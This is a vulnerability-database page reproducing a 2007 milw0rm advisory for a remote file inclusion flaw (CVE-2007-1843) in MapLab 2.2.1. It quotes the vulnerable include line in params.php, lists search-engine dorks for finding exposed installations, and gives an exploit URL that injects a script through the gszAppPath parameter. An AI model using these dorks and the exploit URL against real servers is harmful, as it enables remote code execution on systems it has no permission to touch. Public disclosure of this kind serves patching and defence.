Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2007-1843

Publish Date: 02 Apr 2007

Author: ka0x

                Bug Found By ka0x
D.O.M TEAM
we are: anonyph;arp;ka0x;xarnuz
Contact: ka0x01@gmail.com
FROM SPAIN
---

Script: MapLab
Version: 2.2.1
Official Site: http://www.maptools.org
Download: http://www.maptools.org/dl/ms4w/maplab_ms4w-2.2.1.zip

--

Bug File: params.php
Path: /htdocs/gmapfactory/params.php

Bug code in line 130:
include_once($gszAppPath."htdocs/gmapfactory/build_phtml.php");

--
Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

--

Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript] 

# milw0rm.com [2007-04-02]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

MapLab MS4W 2.2.1 - Remote File Inclusion

Vulmon Search

About

Products

Connect